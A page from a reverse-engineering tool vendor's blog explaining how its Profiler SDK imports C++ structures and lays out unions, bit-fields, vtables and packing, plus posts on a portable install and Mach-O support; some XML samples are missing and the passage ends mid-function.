Cerbero Blog – Page 21

C++ Types: Under the Hood

In this post we’re going to explore the part of the Profiler SDK that deals with imported structures, along with the C++ internals involved in laying out structures and classes.

At first I thought about subdividing the material into several posts, but in the end it’s probably better to have it all together for future reference.

Layouts
Headers
Pointers
Endianness
Arrays
Sub-structures
Unions
Anonymous types
Bit-fields
Namespaces
Inheritance
VTables
Virtual Inheritance
Field alignment
Packing
Templates

Layouts

In the SDK a Layout is the class to be used when we need to create a graphical analysis of raw data. While we can create and handle headers from the UI, it is also possible to do it programmatically.

class LayoutInterval

    end
    start

class LayoutData

    arraySize() -> UInt32
    getColor() -> NTRgb
    getDescription() -> NTUTF8String
    getHeader() -> NTUTF8String
    getType() -> NTUTF8String
    setArraySize(UInt32 n)
    setColor(NTRgb rgba)
    setDescription(NTUTF8String const & description)
    setStruct(NTUTF8String const & hdr, NTUTF8String const & type)
    setTypeOptions(UInt32 opt)
    typeOptions() -> UInt32

class LayoutPair

    first
    second

class Layout

    add(MaxUInt offset, MaxUInt size, LayoutData data)
    add(LayoutInterval interval, LayoutData data)
    at(UInt32 i) -> LayoutPair
    at(LayoutPair const & lp) -> UInt32
    at(LayoutInterval interval) -> UInt32
    count() -> UInt32
    fromXml(NTUTF8String const & xstr) -> bool
    getMatches(MaxUInt offset, MaxUInt size) -> LayoutPairList
    getOverlappingWith(MaxUInt offset, MaxUInt size) -> LayoutPairList
    isModified() -> bool
    isNull() -> bool
    isValid() -> bool
    layoutName() -> NTString
    remove(MaxUInt offset, MaxUInt size)
    remove(LayoutInterval interval)
    renameLayout(NTString const & name) -> bool
    saveIfModified()
    setModified(bool b)
    toXml() -> NTUTF8String

Creating a layout is straightforward:

from Pro.Core import *

# create a new layout or retrieve an existing one from the project
layout = proCoreContext().getLayout("LAYOUT_NAME")
# create data
data = LayoutData()
data.setDescription("text")
data.setColor(ntRgba(0xFF, 0, 0, 0x70))
# add interval
layout.add(70, 30, data)

The data can be associated with a structure (or array of structures) as well. Please remember that the name of a header is always relative to the header sub-directory of the user directory. Saving the layout is not necessary: it’s automatically saved in the project.

Attaching a layout to a hex view is also very easy:

from Pro.UI import *

hv = proContext().getCurrentView()
if hv.type() == ProView.Type_Hex:
    hv.setLayoutName("LAYOUT_NAME")

Of course, layouts can be used for operations not related to graphical analysis as well.

Headers

Headers are part of the CFF Core and as such the naming convention of the CFFHeader class isn’t camel-case.

class CFFHeaderAliasData

    category
    name
    type
    value
    vtype

class CFFHeaderStructData

    name
    schema
    type

class CFFHeaderTypeDefData

    name
    type

class CFFHeader

    AC_Define
    AC_Enum
    AC_Last
    AVT_Integer
    AVT_Last
    AVT_Real
    AVT_String

    BeginEdit()
    Close()
    EndEdit()
    Equals(CFFHeader s) -> bool
    static GetACName(int category) -> char const *
    static GetAVTName(int vtype) -> char const *
    GetAliasCount() -> UInt32
    GetAliasData(UInt32 i) -> CFFHeaderAliasData
    GetStructBaseData(UInt32 i) -> CFFHeaderStructData
    GetStructCount() -> UInt32
    GetStructData(UInt32 i) -> CFFHeaderStructData
    GetStructData(char const * name) -> CFFHeaderStructData
    GetTypeDefCount() -> UInt32
    GetTypeDefData(UInt32 i) -> CFFHeaderTypeDefData
    InsertAlias(char const * name, int category, char const * type, int vtype, char const * value)
    InsertStruct(char const * name, char const * type, char const * schema)
    InsertTypeDef(char const * name, char const * type)
    IsModified() -> bool
    IsNull() -> bool
    IsValid() -> bool
    LoadFromFile(NTString const & name) -> bool
    LoadFromXml(NTXml xml) -> bool
    LoadFromXml(NTUTF8String const & xml) -> bool
    SetModified(bool b)

A CFFHeader represents an abstract database in which structures/classes and other things are stored. While we won’t use most of its methods, some of them are very useful for common operations.

Let’s say we want to retrieve a specific structure from a header and use it.

from Pro.Core import *

def output(s):
    out = proTextStream()
    s.Dump(out)
    print(out.buffer)

obj = proCoreContext().currentScanProvider().getObject()
hdr = CFFHeader()
if hdr.LoadFromFile("WinNT"):
    s = obj.MakeStruct(hdr, "_IMAGE_DOS_HEADER", 0, CFFSO_Pack1)
    output(s)

The output of this snippet is:

e_magic   : 5A4D
e_cblp    : 0090
e_cp      : 0003
e_crlc    : 0000
e_cparhdr : 0004
e_minalloc: 0000
e_maxalloc: FFFF
e_ss      : 0000
e_sp      : 00B8
e_csum    : 0000
e_ip      : 0000
e_cs      : 0000
e_lfarlc  : 0040
e_ovno    : 0000
e_res.0   : 0000
e_res.1   : 0000
e_res.2   : 0000
e_res.3   : 0000
e_oemid   : 0000
e_oeminfo : 0000
e_res2.0  : 0000
e_res2.1  : 0000
e_res2.2  : 0000
e_res2.3  : 0000
e_res2.4  : 0000
e_res2.5  : 0000
e_res2.6  : 0000
e_res2.7  : 0000
e_res2.8  : 0000
e_res2.9  : 0000
e_lfanew  : 000000F8
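For comparison, the same 64 bytes can be decoded without the SDK. What follows is only a minimal sketch based on Python’s standard struct module: the format string and the parse_dos_header helper are my own illustration and not part of the Profiler, and the sample bytes are rebuilt from the values in the dump above. The ‘<’ prefix selects little endian and disables padding, which mirrors a packing of 1.

```python
import struct

# 14 WORDs, e_res[4], e_oemid, e_oeminfo, e_res2[10], then the LONG e_lfanew.
# '<' means little endian with no padding between fields (packing of 1).
DOS_HEADER_FORMAT = "<14H4H2H10Hl"

SCALAR_NAMES = [
    "e_magic", "e_cblp", "e_cp", "e_crlc", "e_cparhdr", "e_minalloc",
    "e_maxalloc", "e_ss", "e_sp", "e_csum", "e_ip", "e_cs", "e_lfarlc",
    "e_ovno",
]

def parse_dos_header(data, offset=0):
    """Hypothetical helper: decode an _IMAGE_DOS_HEADER into a dict."""
    values = struct.unpack_from(DOS_HEADER_FORMAT, data, offset)
    fields = dict(zip(SCALAR_NAMES, values[:14]))
    fields["e_res"] = values[14:18]
    fields["e_oemid"], fields["e_oeminfo"] = values[18:20]
    fields["e_res2"] = values[20:30]
    fields["e_lfanew"] = values[30]
    return fields

# Sample data rebuilt from the values printed in the dump above.
sample = struct.pack(
    DOS_HEADER_FORMAT,
    0x5A4D, 0x0090, 0x0003, 0x0000, 0x0004, 0x0000, 0xFFFF,
    0x0000, 0x00B8, 0x0000, 0x0000, 0x0000, 0x0040, 0x0000,
    *([0] * 4), 0, 0, *([0] * 10), 0xF8,
)

header = parse_dos_header(sample)
print(f"e_magic : {header['e_magic']:04X}")
print(f"e_lfanew: {header['e_lfanew']:08X}")
```

The sketch only covers this one structure; the point of MakeStruct is that the layout comes from the header database instead of a hand-written format string.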

We can specify the following options when retrieving a structure:

CFFSO_EndianDefault
CFFSO_EndianLittle
CFFSO_EndianBig
CFFSO_EndiannessDefault
CFFSO_EndiannessLittle
CFFSO_EndiannessBig

CFFSO_PointerDefault
CFFSO_Pointer16
CFFSO_Pointer32
CFFSO_Pointer64

CFFSO_PackNone
CFFSO_Pack1
CFFSO_Pack2
CFFSO_Pack4
CFFSO_Pack8
CFFSO_Pack16

CFFSO_NoCompiler
CFFSO_VC
CFFSO_GCC
CFFSO_Clang

These are the same options which are available from the UI when adding a structure to a layout.

When options are not specified, they default to the default structure options of the object. It’s possible to specify the default structure options with this method:

SetDefaultStructOptions(UInt32 options)

We’ll see later the implications of the various flags.

When I said that a CFFHeader represents an abstract database, I meant that it is not really bound to a specific format internally. All it cares about is that data is retrieved or set. The standard format used by headers is SQLite and you’ll need to use that format when creating layouts associated to structures. However, when using structures from Python it can be handy to avoid an associated header file. When the number of structures is very limited and you don’t need write or other complex operations, structures can be stored into an XML string. In fact, the internal format of structures is XML. Let’s take a look at one:

We can inspect the format of a structure stored in a header from the Header Manager in the Explore tab by double clicking on it. But we can also avoid creating a header altogether and output the schema of parsed structures directly when importing them from C++. Just check ‘Test mode’ and as ‘Output’ select ‘schemas’.

Let’s import a simple structure such as:

struct A
{
    int a;
};

The output will be:

To use this structure from Python we can write the following code:

schema = """



  



"""

hdr = CFFHeader()
if hdr.LoadFromXml(schema):
    s = obj.MakeStruct(hdr, "A", 0)
    output(s)

As you can see it’s very simple. I’ll use this method for the examples in the rest of the post, because they’re just examples and there’s no point in creating a header file for them.

Pointers

CFFSO_Pointer16
CFFSO_Pointer32
CFFSO_Pointer64

As a rule of thumb, if a structure contains a pointer (or a vtable pointer) it is always a good idea to specify the desired size. When the size is omitted both in the explicit options and in the default structure options, it will be set to the default pointer size of the object, which, apart from PEObjects and MachObjects, will always be 32 bits.
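To see why the pointer size matters, here is a small SDK-independent sketch. It takes a hypothetical structure made of one pointer followed by an ‘int’, with a packing of 1, and computes where the ‘int’ ends up for each pointer size. The layout_with_pointer helper is an assumption made for illustration only.

```python
import struct

# struct module codes for unsigned integers of 16, 32 and 64 bits
POINTER_FORMATS = {16: "H", 32: "I", 64: "Q"}

def layout_with_pointer(pointer_bits):
    """Return (offset of 'a', total size) for: struct { void *p; int a; }.

    Little endian, packing of 1 (the '<' prefix disables padding).
    """
    pointer = POINTER_FORMATS[pointer_bits]
    offset_a = struct.calcsize("<" + pointer)
    total_size = struct.calcsize("<" + pointer + "i")
    return offset_a, total_size

for bits in (16, 32, 64):
    offset_a, total_size = layout_with_pointer(bits)
    print(f"pointer {bits:2}: a at offset {offset_a}, size {total_size}")
```

Every field after the pointer shifts, so a wrong pointer size misreads everything that follows.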

Endianness

CFFSO_EndianLittle
CFFSO_EndianBig
# or
CFFSO_EndiannessLittle
CFFSO_EndiannessBig

When endianness is not specified it will be set to the default of the object. While internally it’s already possible to have individual fields with different endianness, an extra XML field attribute to specify it will be added in the future.
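As a quick reminder of what the flag changes, this sketch (plain Python, no SDK involved) reads the same four bytes used throughout the examples with both byte orders.

```python
import struct

raw = bytes.fromhex("4D5A9000")  # first four bytes of the sample file

little, = struct.unpack("<I", raw)  # least significant byte first
big, = struct.unpack(">I", raw)     # most significant byte first

print(f"little: {little:08X}")  # little: 00905A4D
print(f"big   : {big:08X}")     # big   : 4D5A9000
```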

Arrays

The first thing to say is that there’s a difference between an array of top level structures and an array of fields. Creating a top level array of structures is easy:

s = obj.MakeStructArray(hdr, "A", 0, 10)

The support of arrays is somewhat limited. Multidimensional arrays are only partially supported, in the sense that they will be converted to a single dimension. For instance:

struct A
{
    int a[10][10];
};

Or in XML:

Will be converted to:

a.0 : 00905A4D
a.1 : 00000003
a.2 : 00000004
a.3 : 0000FFFF
a.4 : 000000B8
a.5 : 00000000
a.6 : 00000040
a.7 : 00000000
a.8 : 00000000
a.9 : 00000000
a.10: 00000000
a.11: 00000000
a.12: 00000000

; etc.

Also notice that to access an array element in a CFFStruct the syntax to use is not “a[15]” but “a.15”, e.g.:

print(s.Str("a.15"))
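If you need to map a multidimensional C++ index onto the flattened one, row-major order (the order in which C and C++ store arrays in memory) is the natural assumption. The helpers below are hypothetical and not part of the SDK; they only illustrate the arithmetic.

```python
def flat_index(indices, dims):
    """Row-major flat index of an element in a multidimensional array."""
    if len(indices) != len(dims):
        raise ValueError("one index per dimension is required")
    flat = 0
    for index, dim in zip(indices, dims):
        if not 0 <= index < dim:
            raise IndexError("index out of range")
        flat = flat * dim + index
    return flat

def member_name(name, indices, dims):
    """Build the dotted name used to address a flattened array element."""
    return f"{name}.{flat_index(indices, dims)}"

# a[1][5] in 'int a[10][10]' becomes element 15 of the flattened array
print(member_name("a", (1, 5), (10, 10)))  # a.15
```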

Sub-structures

The only thing to mention about Sub-structures is that complex sub-types are always dumped separately, e.g.:

struct A
{
    int a;
    struct SUB
    {
        int sub;
    } b;
};

In XML:

In Python:

schema = """



  



  
  



"""
hdr = CFFHeader()
if hdr.LoadFromXml(schema):
    s = obj.MakeStruct(hdr, "A", 0)
    output(s)

The output:

a    : 00905A4D
b.sub: 00000003

Since ‘A::SUB’ is a separate type, we can also use it without its parent.

A new thing we’ve just seen is the presence of multiple structures in a single XML header. I’ve pasted the whole Python code once again just for clarity, in the next examples I won’t repeat it, since the Python code never changes, only the header string does.

Unions

Unions, just like sub-structures, are fully supported. The only thing to keep in mind is what happens when we have a top level union, meaning one not contained in another structure, such as:

union A
{
    int a;
    short b;
};

Then to access its members it is necessary to add a ‘u.’ prefix. The reason for this is that CFFStructs support unions only as members, so the union above will result in a CFFStruct with a union member called ‘u’.

u.a: 00905A4D
u.b: 5A4D
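The two values above come from the same bytes, since all members of a union start at offset 0. A minimal sketch in plain Python (not SDK code) that reproduces them:

```python
import struct

raw = bytes.fromhex("4D5A9000")  # first four bytes of the sample file

# Both members are read from offset 0, little endian.
a, = struct.unpack_from("<i", raw, 0)  # int a
b, = struct.unpack_from("<h", raw, 0)  # short b

print(f"u.a: {a:08X}")  # u.a: 00905A4D
print(f"u.b: {b:04X}")  # u.b: 5A4D
```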

Anonymous types

Anonymous types are only partially supported in the sense that they are given a name when imported. A type such as the following:

struct A
{
    union
    {
        int a;
        int b;
    } u;
};

Results in the following XML:

As you can see, a ‘_Type_’ + number naming convention has been used to rename anonymous types. The first character (‘_’) in the name represents the default anonymous prefix. This prefix is customizable. If a typedef is found for an anonymous type, then the new name for that type will be created by using the anonymous prefix + the typedef name.

Bit-fields

Bit-fields are fully supported.

struct A
{
    int a : 1;
    int b : 4;
};

Output:

a: 01
b: 06
 : 0482D2

The unnamed field at the end represents the unused bits given the field size: in this case we have an ‘int’ type and we’ve used only 5 bits of it.
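The values in the output can be checked by hand. The sketch below assumes that bit-fields are allocated starting from the least significant bit of a 32-bit little-endian storage unit, which is what the output above suggests; it is not a description of the Profiler internals, and split_bitfields is a hypothetical helper.

```python
def split_bitfields(value, widths, storage_bits=32):
    """Split a storage unit into bit-fields, least significant bits first.

    Returns the list of field values and the value of the unused bits.
    """
    if sum(widths) > storage_bits:
        raise ValueError("bit-fields do not fit in the storage unit")
    fields = []
    shift = 0
    for width in widths:
        fields.append((value >> shift) & ((1 << width) - 1))
        shift += width
    remaining = storage_bits - shift
    rest = (value >> shift) & ((1 << remaining) - 1)
    return fields, rest

# 0x00905A4D is the first dword of the sample file
(a, b), rest = split_bitfields(0x00905A4D, [1, 4])
print(f"a: {a:02X}")     # a: 01
print(f"b: {b:02X}")     # b: 06
print(f" : {rest:06X}")  #  : 0482D2
```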

There are significant differences in how compilers handle bit-fields. Visual C++ behaves differently than GCC/Clang. Some of the differences are summarized in this message by Richard W.M. Jones.

Another important difference I noticed is how bit fields are coalesced when the type changes, e.g.:

struct A
{
    int a : 1;
    short b : 1;
    int c : 1;
};

Without going now into how they are coalesced, the thing to remember is that the Profiler handles all these cases, but you need to specify the compiler to obtain the correct result.

Namespaces

Namespaces are fully supported.

namespace N
{

struct A
{
    int a;
};

}

Results in:

Moreover, just as in C++ we can use namespaces to encapsulate #include directives.

namespace N
{

#include <Something>

}

This will cause all the types declared in ‘Something’ to be prefixed by the namespace (‘N::’). This can be very handy when we want to include types with the same name into the same header file.

Inheritance

Inheritance is fully supported.

struct A
{
    int a;
};

struct B : public A
{
    int b;
};

XML:

Output:

a: 00905A4D
b: 00000003

Same with multiple inheritance:

Output:

a: 00905A4D
b: 00000003
c: 00000004

VTables

The presence of virtual table pointers in structures which require them is fully supported. Let’s take for instance:

struct A
{
    virtual void v() { }

    int a;
};

XML:

Output:

__vtable_ptr_0: 00905A4D
a             : 00000003

Let’s see an example with multiple inheritance:

struct A
{
    virtual void va() { }

    int a;
};

struct B
{
    virtual void vb() { }

    int b;
};

struct C : public A, public B
{
    int c;
};

Output:

__vtable_ptr_0: 00905A4D
__vtable_ptr_1: 00000003
a             : 00000004
b             : 0000FFFF
c             : 000000B8

When virtual tables are involved it is very important to specify the compiler, because things can vary a great deal between VC++ and GCC/Clang.

Virtual Inheritance

Virtual inheritance is fully supported. Virtual inheritance is a C++ feature to be used in scenarios which involve multiple inheritance with a common base class.

Let’s take the complex case of:

struct A
{
    int a;
    virtual void va() {}
};

struct B : public virtual A
{
    virtual void vb() {}
};

struct B2
{
    virtual void vb2() {}
};

struct C : public virtual A, public B
{
    int b;
    virtual void vc() {}
};

struct TOP
{
    int top;
    C c;
    virtual void vtop() {}
};

Output (Visual C++):

__vtable_ptr_0  : 00905A4D
top             : 00000003
c.__vtable_ptr_0: 00000004
c.__vtable_ptr_1: 0000FFFF
c.__vtable_ptr_2: 000000B8
c.b             : 00000000
c.a             : 00000040

Output (GCC):

__vtable_ptr_0  : 00905A4D
top             : 00000003
c.__vtable_ptr_0: 00000004
c.b             : 0000FFFF
c.a             : 000000B8

As you can see the layout differs from Visual C++ to GCC. Another thing to notice is that members of virtual base classes are appended at the end. There’s a very good presentation by Igor Skochinsky on C++ decompilation you can watch for more information.

Field alignment

Field alignment is an important factor. Structures which are not subject to packing constraints are aligned up to their biggest native member. It’s more complex than this, because sub-structures influence parent structures but not vice versa. Suffice it to say that there are some internal gotchas, but the Profiler should handle all cases correctly.

Packing

CFFSO_Pack1
CFFSO_Pack2
CFFSO_Pack4
CFFSO_Pack8
CFFSO_Pack16

When a packing constraint is applied, fields are aligned to either the field size or the packing whichever is less. A packing constraint of 1 is essential if we want to read raw data without any kind of padding between fields. For instance, PE structures in WinNT.h are all pragma packed to 1, so we must specify the same packing when using them.
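The rule above can be turned into a few lines of Python. This is only a sketch under simplifying assumptions: it handles scalar fields only, it takes the natural alignment of a scalar to be its size, and it rounds the total size up to the largest alignment used. The layout helper and the example structure are hypothetical.

```python
def layout(fields, pack=None):
    """Compute field offsets and total size for a list of (name, size).

    Without packing each field is aligned to its own size; with packing
    the alignment is the smaller of the field size and the packing value.
    """
    offsets = {}
    offset = 0
    struct_align = 1
    for name, size in fields:
        align = size if pack is None else min(size, pack)
        offset = (offset + align - 1) // align * align  # round up
        offsets[name] = offset
        offset += size
        struct_align = max(struct_align, align)
    total = (offset + struct_align - 1) // struct_align * struct_align
    return offsets, total

# struct { char c; int i; short s; }
fields = [("c", 1), ("i", 4), ("s", 2)]

for pack in (None, 1, 2):
    offsets, total = layout(fields, pack)
    print(f"pack={pack}: offsets={offsets}, size={total}")
```

With no packing the structure takes 12 bytes, with a packing of 2 it takes 8 and with a packing of 1 it takes 7, which is why reading PE structures with the wrong packing shifts every field after the first padded one.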

Templates

And to finish, a little treat: C++ templates. Let’s take for instance:

template <typename T>
struct A
{
    T a;
};

template <typename T>
struct B
{
    T b;
};

XML:

We can specify template parameters following the C++ syntax:

s = obj.MakeStruct(hdr, "B>", 0)

Output:

b.a: 00905A4D

So, even nested templates are supported. 😉

C++ Types: Introduction

As announced previously, the upcoming 0.9.7 version of the Profiler represents a milestone in the development road map. We’re excited to present to you an awesome set of new features. In fact, the ground to cover is so vast that one post is not nearly enough. Throughout this week I’ll write some posts to cover the basics and this will allow for enough time to beta test the new version before reaching a release candidate.

Let’s start with an awesome image:

Does it look like a Clang based tool to parse C++ sources and extract type information? If yes, then that’s exactly it!

To sum it up very briefly, the Profiler is now able to extract C++ types such as classes and structures and use these types both in the UI and in Python.

Of course, there’s much more to it. The layout of C++ types is a complex matter and doesn’t just involve supporting simple data structures. This post is just an introduction; the next ones will focus on topics such as endianness, pointers, arrays, sub-structures, unions, bit-fields, inheritance, virtual tables, virtual inheritance, anonymous types, alignment, packing and templates. Yes, you read correctly: templates. 🙂

And apart from the implications of C++ types themselves, there’s the SDK part of the Profiler which will also require some dedicated posts. In this introduction I’m going to show a very simple flow and one of the many possible use cases.

You probably have noticed that the code in the screenshot above belongs to WinNT.h. Let’s see how to import the types in this header quickly. Usually we could parse all the headers of a framework with a few clicks, but while Clang is ideal to parse both Linux and OS X sources, it has difficulty with some Visual C++ extensions which are completely invalid C++ code. So rather than importing the whole Windows SDK we just limit ourselves to a part of WinNT.h.

I have added some predefines for Windows types (we could also include WinDef.h):

#define BYTE unsigned char
#define WORD unsigned short
#define DWORD unsigned int
#define __int64 long long
#define LONG long
#define CHAR char
#define WCHAR short
#define ULONGLONG unsigned long long
#define UNALIGNED
#define SHORT short
#define NTAPI
#define VOID void
#define PVOID void *
#define BOOL unsigned int
#define BOOLEAN unsigned int

Then I just copied the header into the import tool. Usually this isn’t necessary, because we can set up the include directories from the UI and then just use #include directives, but since we need to modify the header to remove invalid C++ extensions, it makes sense to paste it.

The beginning of the code:

HEADER_START("WinNT");

typedef struct _GUID {
    unsigned long  Data1;
    unsigned short Data2;
    unsigned short Data3;
    unsigned char  Data4[ 8 ];
} GUID;

typedef GUID CLSID;

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    WORD   e_cblp;                      // Bytes on last page of file
    WORD   e_cp;                        // Pages in file
    WORD   e_crlc;                      // Relocations
    WORD   e_cparhdr;                   // Size of header in paragraphs
    WORD   e_minalloc;                  // Minimum extra paragraphs needed
    WORD   e_maxalloc;                  // Maximum extra paragraphs needed
    WORD   e_ss;                        // Initial (relative) SS value
    WORD   e_sp;                        // Initial SP value
    WORD   e_csum;                      // Checksum
    WORD   e_ip;                        // Initial IP value
    WORD   e_cs;                        // Initial (relative) CS value
    WORD   e_lfarlc;                    // File address of relocation table
    WORD   e_ovno;                      // Overlay number
    WORD   e_res[4];                    // Reserved words
    WORD   e_oemid;                     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;                   // OEM information; e_oemid specific
    WORD   e_res2[10];                  // Reserved words
    LONG   e_lfanew;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

// etc. etc.

Did you notice the HEADER_START macro?

HEADER_START("WinNT");

This tells our parser that the C++ types following this directive will be dumped into the header “WinNT.cphdr”. This file is relative to the header directory, a sub-directory of the user data directory. A HEADER_END directive also exists; it is equivalent to invoking the start directive with an empty string. To give you a better idea of how these directives work, take a look at this snippet:

// the types in A.h won't be dumped to a header file
#include <A.h>

HEADER_START("BC");

// the types of B.h and C.h will end up in BC.cphdr
#include <B.h>
#include <C.h>

HEADER_END();

// what follows is not dumped to a header file

If you specify the “#” string in the start directive, the types which follow will be dumped to the ‘this’ header. This is a special header which lives in the current project, so that you can pass the Profiler project to a colleague and it will already contain the necessary types without having to send extra files.

Back to the importing process, we click on ‘Import’ and that’s it. If Clang encounters C++ errors, we can fix them thanks to the diagnostic information:

We can explore the created header file from the ‘Explore’ tab.

Now let’s use the header to analyze a PE file inside of a Zip archive.

Please notice that I’m adding the types with a packing of 1: PE structures are pragma packed to 1.

What you see applied to the hex view is a layout. In a layout you can insert structures or intervals (a segment of data with a description and a color).

A layout can even be created programmatically and be attached to a hex view as we’ll see in some other post. The implementation of layouts in the Profiler is quite cool, because they are standalone objects. Layouts are not really bound to a hex view: a view just chooses to be attached to a layout. This means that you can share a single layout among different hex views and changes will reflect in all attached views.

And while I didn’t mention it, the table view below on the left is the layout inspector. Its purpose is to let you inspect the structures associated to a layout at a particular position. Since layouts allow for overlapping structures, the inspector shows all structures associated in the current range.
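The idea of showing every structure that covers the current range can be pictured with a toy model. This is not the SDK’s Layout class: the (start, size, name) tuples, the entry names and the overlapping helper are all hypothetical, and intervals are treated as half-open ranges.

```python
def overlapping(entries, offset, size):
    """Return the names of all entries that overlap [offset, offset + size)."""
    end = offset + size
    return [
        name
        for start, length, name in entries
        if start < end and offset < start + length
    ]

# A toy layout: two overlapping entries at the start and one further on.
entries = [
    (0x00, 64, "_IMAGE_DOS_HEADER"),
    (0x00, 2, "magic number note"),
    (0xF8, 4, "PE signature"),
]

print(overlapping(entries, 0x00, 1))   # both entries covering offset 0
print(overlapping(entries, 0x3C, 4))   # only the DOS header
print(overlapping(entries, 0x100, 4))  # nothing here
```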

But what if you go somewhere else and return to the hex view? The layout will be gone. Of course, you could press Ctrl+Alt+L and re-attach the layout to the view. There are two other options: navigate back or create a bookmark!

The created bookmark when activated will jump to the right entry and associate the layout for us. Remember that changing the name of a layout invalidates the bookmark.

That’s all for now. And we’ve only scratched the surface… 🙂
Author: Erik Pistelli. Posted on August 5, 2013 (updated April 1, 2021). Categories: Suite Standard. Tags: C, Clang, Classes, GCC, Structs, Structures, VC, Visual C++.

Portable Application

This is a very small addition to the upcoming 0.9.7 version of the Profiler, but nonetheless it can be handy. There are occasions in which it is necessary to copy the Profiler from one Windows system to another. Currently this involves copying the user settings: the ones stored in AppData and those in the Windows registry. In this post we’ll see how to create a standalone version of the Profiler which leaves nothing behind on the system. Here’s how:

1 – Copy the directory of the Profiler from the installation path to a writable location.
2 – Create a sub-directory named “user”.
3 – Run the Profiler.

That’s it. Now all your settings will be stored under the user directory.

Remember to create your config files for extensions, actions, key providers, etc. under user/config/, as the config directory under the root one contains files which might be overwritten during an update.

Python can be stored as a sub-directory and its path, once set, will automatically be recognized as a relative one.

There won’t be many posts this month: a major update is under development and we hope it will be ready by the end of the month. Stay tuned as something extremely cool is coming. 😉
Author: Erik Pistelli. Posted on July 13, 2013. Categories: Suite Standard. Tags: Portable Application, Standalone.

News for version 0.9.6

The new 0.9.6 version of the Profiler is out. The main new feature is the support for Mach-O files. Since this feature stands on its own, it did make sense to postpone other features to the next version and in the meanwhile let our users benefit from this addition.

Here’s the changelist:

– added support for Mach-O files
– added support for fat/universal binaries
– added support for Apple code signatures
– exposed DemangleSymbolName to Python

The DemangleSymbolName function demangles both VC++ and GCC symbols. Its use is straightforward:

from Pro.Core import DemangleSymbolName

demangled = DemangleSymbolName("__ZNK8OSObject14getRetainCountEv")
print(demangled)
# outputs: OSObject::getRetainCount() const

Author: Erik Pistelli. Posted on June 27, 2013. Categories: Suite Standard. Tags: News.

Mach-O support (including Universal Binaries and Apple Code Signatures)

The reason behind this addition is that before undertaking the next big step in the road map of the Profiler there was some spare time to dedicate to some extra features for the upcoming 0.9.6 version. There have also been some customer requests for Mach-O support, so we hope that this will satisfy their request. While there are still some things left which would be useful and nice to add to the Mach-O support, they are not many.

The first screenshot as you can see features the Mach-O layout.

The logic of Mach-Os starts with their load commands which describe everything else:

Segments and sections:

Entry points (LC_MAIN, LC_UNIXTHREAD):

Symbols:

Then the LC_DYLD_INFO can describe some VM operations for rebasing and binding:

Binding:

Also the DyldInfo export section is represented as a tree, just as it is in the file:

Function starts:

Of course, Mach-O support makes little sense without Fat/Universal Binary support:

While the upcoming version won’t yet support validation of Apple Code Signatures embedded in Mach-Os, it’s already possible to inspect their format and the embedded certificates.

As usual all the formats added have been exposed to Python as well. I paste some of the SDK class documentation here excluding constants, which are just too many.

class MachObject : CFFObject

    AddressToOffset(MaxUInt address) -> MaxUInt
    AddressToSection(MaxUInt address) -> CFFStruct
    AddressToSegment(MaxUInt address) -> CFFStruct
    BuildSymbolsValueHash(CFFStruct symtablc) -> NTHash< MaxUInt,UInt32 >
    CertificateLCs() -> NTUIntVector
    DyLibModules(CFFStruct dysymtablc) -> CFFStruct
    DySymTableLC() -> CFFStruct
    DyTableOfContents(CFFStruct dysymtablc) -> CFFStruct
    DyldDisassembleBind(NTTextStream out, MaxUInt offset, UInt32 size)
    DyldDisassembleBind(NTTextStream out, CFFStruct dyldinfo)
    DyldDisassembleLazyBind(NTTextStream out, CFFStruct dyldinfo)
    DyldDisassembleRebase(NTTextStream out, MaxUInt offset, UInt32 size)
    DyldDisassembleRebase(NTTextStream out, CFFStruct dyldinfo)
    DyldDisassembleWeakBind(NTTextStream out, CFFStruct dyldinfo)
    DyldFindExportedSymbol(CFFStruct dyldinfo, char const * symbol) -> MaxUInt
    DyldInfoLC() -> CFFStruct
    EntryPointAddress(CFFStruct lc) -> MaxUInt
    EntryPointLCs() -> NTUIntVector
    ExternalSymbolReferences(CFFStruct dysymtablc) -> CFFStruct
    FunctionStartsLC() -> CFFStruct
    FunctionStartsOffsetsAndValues(CFFStruct funcstartslc, NTVector< MaxUInt > & values) -> NTUIntVector
    GetLC(LoadCmdInfo info) -> CFFStruct
    GetLC(UInt32 index) -> CFFStruct
    GetLCCount() -> UInt32
    GetLCDescription(CFFStruct s) -> NTString
    GetLCDescription(UInt32 index) -> NTString
    GetLCInfo(UInt32 index) -> LoadCmdInfo
    GetLCInfoFromOffset(MaxUInt offset) -> LoadCmdInfo
    static GetLCName(UInt32 cmd) -> NTString
    IndirectSymbolTable(CFFStruct dysymtablc) -> CFFStruct
    IsMachO64() -> bool
    MachHeader() -> CFFStruct
    OffsetToAddress(MaxUInt offset) -> MaxUInt
    OffsetToSection(MaxUInt offset) -> CFFStruct
    OffsetToSegment(MaxUInt offset) -> CFFStruct
    ProcessLoadCommands() -> bool
    ReadSLEB128(NTBuffer b) -> Int64
    ReadSLEB128(MaxUInt offset, UInt32 & size) -> Int64
    ReadULEB128(NTBuffer b) -> UInt64
    ReadULEB128(MaxUInt offset, UInt32 & size) -> UInt64
    SectionFromOffset(UInt32 cmd, MaxUInt offset) -> CFFStruct
    SegmentSections(CFFStruct seg) -> CFFStruct
    SymTableLC() -> CFFStruct
    SymbolNList(CFFStruct symtablc) -> CFFStruct

class FatObject : CFFObject

    Architectures() -> CFFStruct

class AppleCodeSignatureObject : CFFObject

    BlobFromOffset(UInt32 offset) -> CFFStruct
    BlobIndexes(CFFStruct supblob) -> CFFStruct
    BlobName(UInt32 magic) -> NTString
    BlobName(CFFStruct blob) -> NTString
    IsSuperBlob(UInt32 magic) -> bool
    IsSuperBlob(CFFStruct blob) -> bool
    TopBlob() -> CFFStruct
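The ReadULEB128 and ReadSLEB128 methods listed above deal with LEB128, the variable-length integer encoding used in several parts of the dyld information. For readers unfamiliar with it, here is a minimal decoder in plain Python. It is an independent sketch and not the SDK implementation: the function names and the (value, size) return convention are my own choice for illustration.

```python
def read_uleb128(data, offset=0):
    """Decode an unsigned LEB128 value; return (value, bytes consumed)."""
    result = 0
    shift = 0
    pos = offset
    while True:
        byte = data[pos]
        pos += 1
        result |= (byte & 0x7F) << shift  # low 7 bits carry the payload
        shift += 7
        if not byte & 0x80:               # high bit clear: last byte
            break
    return result, pos - offset

def read_sleb128(data, offset=0):
    """Decode a signed LEB128 value; return (value, bytes consumed)."""
    result = 0
    shift = 0
    pos = offset
    while True:
        byte = data[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        shift += 7
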